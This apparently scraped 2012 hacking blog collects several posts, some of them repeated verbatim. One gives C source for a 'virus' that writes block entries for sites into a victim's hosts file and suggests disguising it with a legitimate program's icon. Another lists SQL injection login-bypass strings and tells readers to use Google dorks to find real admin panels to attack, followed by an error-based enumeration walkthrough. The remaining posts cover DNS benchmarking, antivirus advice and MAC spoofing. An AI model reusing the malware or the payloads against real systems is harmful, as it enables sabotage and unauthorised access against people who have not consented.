Wednesday, April 25, 2012
Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself. Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie: The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.
1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).
2. Right-click on the exe file whose ICON is to be changed.
3. Now you will see the option Change Icon. Click on that option.
4. Now the Icon Changer program will open up.
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.
6. Now select the ICON of your choice and click on SET.
7. Now a popup window will appear and ask you to select from either of these two options.
(a). Change embeded icon.
(b). Adjust Windows to display custom icon.
Select the first option (Change embeded icon).
8. You are done. The ICON get’s changed.
Tag :// Creat virus
Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IEor Firefox. So once blocked, the site will not appear in any of the browser program.
Here is the sourcecode of the virus.
-------------------------------------------------------------------------------
#include<stdio.h>
#include<dos.h>
#include<dir.h>
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
----------------------------------------------------------------------------
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1 google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?
Tag :// Creat virus
What is a Computer Virus ?
A potentially damaging computer programme capable of reproducing itself causing great harm to files or other programs without permission or knowledge of the user.
Types of viruses :-
The different types of viruses are as follows-
1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.
Examples of boot- sector viruses are Michelangelo and Stoned.
2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .
Some common file viruses are Sunday, Cascade.
3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.
Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.
4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.
5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.
6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.
Tag :// Basics,
Tag :// Creat virus
Sunday, April 22, 2012
Hello friends,In my previous post I had written about SQL injection Based on Google Hacking(to clear basics).So,Its time to do some serious hacks.Be ready:
(Sometime,It is illegal to break the privacy of someone.So,Do at your own risk.I am not responsible for any action taken by you after reading this post.)
First,You have to find out the Vulnerable SQL Website.
Follow the steps:
1. Go to Google and Type
inurl:admin.asp or inurl:admin.php or inurl:admin.html etc.This will show you the list of websites.
2. Open Any website of your choice.
3. Now you will see the administrator panel requiring
USERNAME and PASSWORD.
Here, you can use SQL injection and put in place of USERNAME AND PASSWORD:
1.)
USERNAME: 1'or'1'='1
PASSWORD: 1'or'1'='1 [DATABASE_SUPPORT=MYSQL]
2.)
USERNAME: 1or1=1
PASSWORD: 1or1=1 [DATABASE_SUPPORT=MYSQL]
3.)
USERNAME: 1'1
PASSWORD: 1'1 [DATABASE_SUPPORT=MYSQL]
4.)
USERNAME: 1 AND 1=1
PASSWORD: 1 AND 1=1 [DATABASE_SUPPORT=MYSQL]
Tag :// SQL
Hello friends,How r you ?In this post,I am writing some hacks that are present in the Internet 24/7 and not noticed by Website Administrator.This hack is also based on Google Hacking and SQL Injection.So,First You need to know.....
WHAT IS SQL INJECTION:
SQL Injection is one of the most common vulnerability on the WEB.Well if you are not familiar with programming language and Scripting then you are wondering What SQL means.SQL is Structured Query Language.
At Present,Most of the Website has Database (eg MySQL) which is stored on there server and is accessible to website administrator only b/z He/She has Username and Password to access the Database.
Ok,Let's take a simple example:
You are surfing on NET and want to open GMAIL,FACEBOOK etc.First thing you have to do is to put your USERNAME and PASSWORD in the LOGIN BOX and after that you will see that your Page is opening.So,What is happening behind the screen or behind the server.When you click on Submit button then your USERNAME and PASSWORD will go to database of server which is stored at their server.And if it is correct then you are Authorized to Enter in next page else not.
When the server receives the username and password strings he will query the database to see if the supplied credentials are valid. He will use an SQL statement for that that may look like this:
SELECT * FROM users WHERE username='xxxxxxx' AND password='xxxxxxxxx'
For those of you who are not familiar with the SQL language, in SQL the ‘ character is used as a delimiter for string variables. Here we use it to delimit the username and password strings supplied by the user.
In this example we see that the username and password supplied are inserted into the query between the ‘ and the entire query is then executed by the database engine. If the query returns any rows, then the supplied credentials are valid (that user exists in the database and has the password that was supplied).
Now, what happens if a user types a ‘ character into the username or password field? Well, by putting only a ‘ into the username field and leaving the password field blank, the query would become:
SELECT * FROM users WHERE username=''' AND password=''
This would trigger an error, since the database engine would consider the end of the string at the second ‘ and then it would trigger a parsing error at the third ‘ character. Let’s now see what would happen if we would send this input data:
Username: ' OR 'a'='a Password: ' OR 'a'='a
The query would become
SELECT * FROM users WHERE username='' OR 'a'='a' AND password='' OR 'a'='a'
Since a is always equal to a, this query will return all the rows from the table users and the server will “think” we supplied him with valid credentials and let as in – the SQL injection was successful .
Now we are going to see some more advanced techniques.. My example will be based on a PHP and MySQL platform. In my MySQL database I created the following table:
CREATE TABLE users ( username VARCHAR(128), password VARCHAR(128), email VARCHAR(128))
There’s a single row in that table with data:
username: testuser password: testing email: testuser@testing.com
To check the credentials I made the following query in the PHP code:
$query="select username, password from users where username='".$user."' and password='".$pass."'";
The server is also configured to print out errors triggered by MySQL (this is useful for debugging, but should be avoided on a production server).
So, last time I showed you how SQL injection basically works. Now I’ll show you how can we make more complex queries and how to use the MySQL error messages to get more information about the database structure.
Lets get started! So, if we put just an ‘ character in the username field we get an error message like You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”” and password=”’ at line 1
That’s because the query became
select username, password from users where username=''' and password=''
What happens now if we try to put into the username field a string like ‘ or user=’abc ? The query becomes
select username, password from users where username='' or user='abc ' and password=''
And this give us the error message Unknown column ‘user’ in ‘where clause’
That’s fine! Using these error messages we can guess the columns in the table. We can try to put in the username field ‘ or email=’ and since we get no error message, we know that the email column exists in that table. If we know the email address of a user, we can now just try with ‘ or email=’xyz@xyz.com in both the username and password fields and our query becomes
select username, password from users where username='' or email='xyz@xyz.com' and password='' or email='xyz@xyz.com'
which is a valid query and if that email address exists in the table we will successfully login!
You can also use the error messages to guess the table name. Since in SQL you can use the table.column notation, you can try to put in the username field ‘ or user.test=’ and you will see an error message like Unknown table ‘user’ in where clause
Fine! Let’s try with ‘ or users.test=’ and we have Unknown column ‘users.test’ in ‘where clause’
so logically there’s a table named users .
Basically, if the server is configured to give out the error messages, you can use them to enumerate the database structure and then you may be able to use these informations in an attack.
WHAT IS SQL INJECTION:
SQL Injection is one of the most common vulnerability on the WEB.Well if you are not familiar with programming language and Scripting then you are wondering What SQL means.SQL is Structured Query Language.
At Present,Most of the Website has Database (eg MySQL) which is stored on there server and is accessible to website administrator only b/z He/She has Username and Password to access the Database.
Ok,Let's take a simple example:
You are surfing on NET and want to open GMAIL,FACEBOOK etc.First thing you have to do is to put your USERNAME and PASSWORD in the LOGIN BOX and after that you will see that your Page is opening.So,What is happening behind the screen or behind the server.When you click on Submit button then your USERNAME and PASSWORD will go to database of server which is stored at their server.And if it is correct then you are Authorized to Enter in next page else not.
When the server receives the username and password strings he will query the database to see if the supplied credentials are valid. He will use an SQL statement for that that may look like this:
SELECT * FROM users WHERE username='xxxxxxx' AND password='xxxxxxxxx'
For those of you who are not familiar with the SQL language, in SQL the ‘ character is used as a delimiter for string variables. Here we use it to delimit the username and password strings supplied by the user.
In this example we see that the username and password supplied are inserted into the query between the ‘ and the entire query is then executed by the database engine. If the query returns any rows, then the supplied credentials are valid (that user exists in the database and has the password that was supplied).
Now, what happens if a user types a ‘ character into the username or password field? Well, by putting only a ‘ into the username field and leaving the password field blank, the query would become:
SELECT * FROM users WHERE username=''' AND password=''
This would trigger an error, since the database engine would consider the end of the string at the second ‘ and then it would trigger a parsing error at the third ‘ character. Let’s now see what would happen if we would send this input data:
Username: ' OR 'a'='a Password: ' OR 'a'='a
The query would become
SELECT * FROM users WHERE username='' OR 'a'='a' AND password='' OR 'a'='a'
Since a is always equal to a, this query will return all the rows from the table users and the server will “think” we supplied him with valid credentials and let as in – the SQL injection was successful .
Now we are going to see some more advanced techniques.. My example will be based on a PHP and MySQL platform. In my MySQL database I created the following table:
CREATE TABLE users ( username VARCHAR(128), password VARCHAR(128), email VARCHAR(128))
There’s a single row in that table with data:
username: testuser password: testing email: testuser@testing.com
To check the credentials I made the following query in the PHP code:
$query="select username, password from users where username='".$user."' and password='".$pass."'";
The server is also configured to print out errors triggered by MySQL (this is useful for debugging, but should be avoided on a production server).
So, last time I showed you how SQL injection basically works. Now I’ll show you how can we make more complex queries and how to use the MySQL error messages to get more information about the database structure.
Lets get started! So, if we put just an ‘ character in the username field we get an error message like You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”” and password=”’ at line 1
That’s because the query became
select username, password from users where username=''' and password=''
What happens now if we try to put into the username field a string like ‘ or user=’abc ? The query becomes
select username, password from users where username='' or user='abc ' and password=''
And this give us the error message Unknown column ‘user’ in ‘where clause’
That’s fine! Using these error messages we can guess the columns in the table. We can try to put in the username field ‘ or email=’ and since we get no error message, we know that the email column exists in that table. If we know the email address of a user, we can now just try with ‘ or email=’xyz@xyz.com in both the username and password fields and our query becomes
select username, password from users where username='' or email='xyz@xyz.com' and password='' or email='xyz@xyz.com'
which is a valid query and if that email address exists in the table we will successfully login!
You can also use the error messages to guess the table name. Since in SQL you can use the table.column notation, you can try to put in the username field ‘ or user.test=’ and you will see an error message like Unknown table ‘user’ in where clause
Fine! Let’s try with ‘ or users.test=’ and we have Unknown column ‘users.test’ in ‘where clause’
so logically there’s a table named users .
Basically, if the server is configured to give out the error messages, you can use them to enumerate the database structure and then you may be able to use these informations in an attack.
Tag :// Basics
Most people use the default DNS settings provided by their ISP, and while they are usually sufficient for most purposes, there are plenty of free options out there, like OpenDNS and Google DNS. Namebench is a free app that checks to see whether your current settings are optimized and, if not, which free option is best for you. Here's how to use it:
Download and install Namebench
Fire it up and choose your settings. Keep the top two boxes checked. If you're concerned about network censorship, check the third box, and if you want to help the developers, check the last box. You can tweak the rest if you're outside U.S. or want to experiment with different browsers.
Click Start Benchmark and wait while Namebench runs its tests. It should take several minutes. A browser tab should pop open when Namebench is done and give you a list of DNS servers and how much faster they are than the one you're currently using, unless yours are already the fastest possible.
Namebench does not change your settings, but it's generally pretty easy to do it yourself. Check with the instructions you got from your ISP to set up your modem and/or router and just substitute the DNS addresses you received from Namebench for the addresses given by your ISP. It's best to do this with your router, as it will assign that DNS address for all the devices attached to it.
That's it! This can dramatically improve your browsing speed, and it's fairly easy to work through.
Download and install Namebench
Fire it up and choose your settings. Keep the top two boxes checked. If you're concerned about network censorship, check the third box, and if you want to help the developers, check the last box. You can tweak the rest if you're outside U.S. or want to experiment with different browsers.
Click Start Benchmark and wait while Namebench runs its tests. It should take several minutes. A browser tab should pop open when Namebench is done and give you a list of DNS servers and how much faster they are than the one you're currently using, unless yours are already the fastest possible.
Namebench does not change your settings, but it's generally pretty easy to do it yourself. Check with the instructions you got from your ISP to set up your modem and/or router and just substitute the DNS addresses you received from Namebench for the addresses given by your ISP. It's best to do this with your router, as it will assign that DNS address for all the devices attached to it.
That's it! This can dramatically improve your browsing speed, and it's fairly easy to work through.
Tag :// cool Tricks
Friday, April 20, 2012
I use the term hacking loosely because in this instance I am referring to anything that you don't want to be traced back to. Private data you send or personal things. This is purely educational.
Things Needed:
VirtualBox
TrueCrypt
Deep Freeze
CCleaner
SMAC
Proxies and Socks4/5
Step 1: Install VirtualBox and create a VirtualBox with a size of about 20GB. Use Windows XP or Windows 7. Those are the 2 most reliable Windows operating systems.
Step 2: Install Truecrypt to the VirtualBox and that will encrypt the whole drive.
Step 3: When the drive is encrypted, install SMAC onto Windows so that you can have a different MAC Address when you want.
Step 4: Install Deep Freeze to the VirtualBox and then whenever you reboot, your files are wiped clean since you started. It is perfect if you can find a batch that will reboot your PC every so often.
Step 5: Once all of these programs and things are loaded fine, use private Socks/5 and access the internet in secure freedom.
Additional note: Truecrypt's encryption process will slow your functions just a little, but will not hinder the usage very much
Tag :// protection
When your computer gets infected with a virus it can be a devastating experience and this is exactly why you need to protect your computer from viruses. A virus can consume your precious computer files and even damage your computer hardware. Is this worth ignoring? I don’t think so! Even sites like www.lifelock.com will tell you the same. Anything you can do whenprotecting your computer from viruses has to be a good thing and is well worth spending your time on. We all know prevention is better than a cure so I am going to share my top 10 tips on how to protect your computer from viruses.
10 tips to protect your computer from viruses
There are many ways to protect your computer from nasty viruses invading. Protecting your computer is an number one concern for every computer user on earth. I do not know anyone that wants to have their computer crash due to a virus invasion. Here are 10 ways to protect your computer and keep your files and data safe.
1. Learn about viruses
The first thing that I recommend is to research and become knowledgeable about viruses. How can you protect your computer from viruses if you don’t even know what they are. Here are some previous tutorials I have written about viruses. See What is a Virus and how do I know if I have one? and What is the difference between a virus, spyware, Malware, and adware? How can you protect your computer from viruses if you don’t know what it is?
2. Arm yourself with the best Anti-virus software to suit your needs.
Not everyone can get away with using free Anti-virus software because it depends what you do on your computer. It depends on factors such as if you download files or not, if you open email attachments, and if you surf suspicious websites. See my reviews for the best Virus Removal Software. Lets face it, if you do not have protection against viruses installed on your computer, you will without a doubt, get a virus within the first hour of surfing the internet. It is that easy. For years I would remove a virus from my dads computer at least once a year, until finally I realized that he needed a paid Anti-virus program. He wasn’t good with computers and if a windows popped up and said he needed to take a scan, he would just do it. He would just presume it was the program I had installed to protect his computer. Now I have Avast on his computer and there has not been one problem since. I bought the Internet security version so it has full protection. It never asks him to do anything and just works in the background.
3. Regular Updates
Having a great Anti-virus program installed on your computer to protect your computer from viruses is great, however if you do not regularly update the virus definitions, then the program is useless. New viruses are produced daily and this is why we constantly have to update the viruses definitions and stay ahead of the bad guys. Avast Internet Security simply updates by itself and just tells me when it is done.
4. Downloading
When surfing the internet avoid websites that contain illegal software downloads, sexual references, free screensavers, cracks or serials, etc. I am sure you get the picture. If you go near these sites you are immediately asking for trouble. Some other websites that you should stay away from include foreign websites where you cannot understand the language on them. This is because you cannot tell what is on the website.
5. Windows Updates
Always update Windows when protecting your computer. These updates contain security updates that will help in your fight against viruses. If you do not perform regular Windows updates you are leaving your computer in a vulnerable state. You can simple check to see if your computer needs updates by going to he start menu and typing in “windows update”. See the screen shot below. You can also view recent Windows update historyso you can be in control of the whole situation.
6. Opening Emails
Be careful when opening emails. There are obvious emails that you know you shouldn’t open, however what about the ones you get from people you know? What if your friend has a virus and it is spreading itself through emails? An email cannot be important enough to risk getting a virus. Delete the email and send a fresh email to your friend asking them if they actually did send you the email. It is better to be safe than sorry.
You can also create a whitelist so only certain emails get through. You will still have to be careful though, as you do not know what security the sender has installed on their computer. It’s like driving on the road, you need to watch how others are driving to stay safe.
7. Change your settings to protect your computer from viruses
If you are really serious about protecting your computer you can change your email settings and receive text emails only. You can also disable the ability to open email attachments. Virus travel in HTML enabled emails and file attachments. They cannot travel in text email messages. I know this sounds very boring, however, I would rather be boring and protect my computer from viruses.
8. Peer to Peer file sharing – ways to protect your computer
Do not use peer to peer (p2p) file sharing programs. These include programs such as Limewire, Bearshare, Gnutella, Morpheus, Torrents, etc. These program let you download files from other computer users connected to their program network. You have no way of knowing what you are actually downloading until it is on your computer. Even if you share files from a cd from a friend, it may have a virus. Protecting your computer from viruses is the most important priority for you and you do not want to risk your computer safety just because you trust your friend.
9. Do not download files from websites
Again, there is no way of knowing what you are downloading. The file can appear to be named like the file you want, however it could be anything. Most of the time, this is how a virus is unleashed, it usually seems like a harmless, familiar object. If you are looking for a driver for a certain brand of computer then make sure you are getting the download from the genuine website. Many websites on the Internet offer free driver downloads, however, many of them contain viruses. Everything is not what it seems, so be very careful.
10. Have Firewall Protection
Make sure you have a firewall enabled on your computer. Windows comes with an inbuilt firewall or you can use a third party firewall program like Zone Alarm. Either way, make sure the firewall is on…To check the Windows Firewall go to the security settings in your control panel.
If you are careful and are serious about learning how to protect your computer from viruses, it is possible to stay safe. My top 10 tips will help you keep your computer running smoothly, and virus free.
Notes on tips to protect your computer from viruses:
These 10 ways to protect your computer from viruses are extremely important tips to follow. If you have had a virus in the past you would know how devastating it is when you lose all of your files and your computer crashes.
People often try to install more than one anti-virus program to protect their computers from viruses. This is not how to protect your computer from viruses as installing more than one program always causes a problem. You can only install one virus removal program at any one time.
Notes on tips to protect your computer from viruses:
These 10 ways to protect your computer from viruses are extremely important tips to follow. If you have had a virus in the past you would know how devastating it is when you lose all of your files and your computer crashes.
People often try to install more than one anti-virus program to protect their computers from viruses. This is not how to protect your computer from viruses as installing more than one program always causes a problem. You can only install one virus removal program at any one time.
Tag :// protection
Thursday, April 19, 2012
Win7 MAC Address changer is a freeware windows program which can change the MAC (Media Access Control) Address of many wired and wireless network adapters. Win7 MAC Address Changer is capable of spoofing MAC Address in all major windows systems including Windows XP, Windows Vista and Windows 7 (both 32bitand 64bit systems).
Download
Tag :// protection
(1) First open run dialog box and type ncpa.cpl
(2) Select appropriate network connections adapter and click on Properties
(3)
Click Configure button to go through the next step.
(4)
Under “Advanced” tab you should see an item called “Network Address” click on it. (See figure below as an example)
On the right side, under “Value”, type in the New MAC address you want to assign to your NIC.
(5)
To verify the MAC ID, simply go to command prompt and enter the command ipconfig /all.
Tag :// Secure YourSelf